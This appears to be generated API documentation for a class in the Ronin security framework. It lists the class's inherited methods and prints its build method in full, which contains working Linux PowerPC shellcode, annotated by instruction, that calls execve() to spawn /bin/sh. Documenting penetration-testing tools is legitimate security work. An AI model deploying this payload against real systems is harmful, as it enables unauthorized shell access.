Class: Ronin::Payloads::Shellcode::Linux::PPC::ExecShell

Inherits:
ExecShellPayload show all
Defined in:
lib/ronin/payloads/builtin/shellcode/linux/ppc/exec_shell.rb

Overview

Linux PPC shellcode that calls execve() with /bin/sh.

Instance Attribute Summary

Attributes inherited from Payload

#encoders, #payload

Instance Method Summary collapse

Methods inherited from Ronin::Payloads::ShellcodePayload

payload_type, #shellcode

Methods inherited from ASMPayload

#assemble, assembler, payload_type

Methods included from Metadata::OS

included, #os, #os_version

Methods included from Metadata::Arch

#arch, included

Methods inherited from BinaryPayload

payload_type

Methods inherited from Payload

#built?, #built_payload, #bytesize, #cleanup, #encode_payload, #encoded_payload, encoder_class, #initialize, #length, payload_type, #perform_build, #perform_cleanup, #perform_postlaunch, #perform_prelaunch, #perform_validate, #postlaunch, #prelaunch, #rebuild_payload, #reencode_payload, register, #to_s, #validate

Constructor Details

This class inherits a constructor from Ronin::Payloads::Payload

Instance Method Details

#buildObject

Builds the shellcode.



54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
 
# File 'lib/ronin/payloads/builtin/shellcode/linux/ppc/exec_shell.rb', line 54

def build
  @payload = "\x7c\x3f\x0b\x78" + # mr	r31,r1
             "\x7c\xa5\x2a\x79" + # xor.	r5,r5,r5
             "\x42\x40\xff\xf9" + # bdzl+	10000454< main>
             "\x7f\x08\x02\xa6" + # mflr	r24
             "\x3b\x18\x01\x34" + # addi	r24,r24,308
             "\x98\xb8\xfe\xfb" + # stb	r5,-261(r24)
             "\x38\x78\xfe\xf4" + # addi	r3,r24,-268
             "\x90\x61\xff\xf8" + # stw	r3,-8(r1)
             "\x38\x81\xff\xf8" + # addi	r4,r1,-8
             "\x90\xa1\xff\xfc" + # stw	r5,-4(r1)
             "\x3b\xc0\x01\x60" + # li	r30,352
             "\x7f\xc0\x2e\x70" + # srawi	r0,r30,5
             "\x44\xde\xad\xf2" + # .long	0x44deadf2
             "/bin/shZ"  # the last byte becomes NULL
end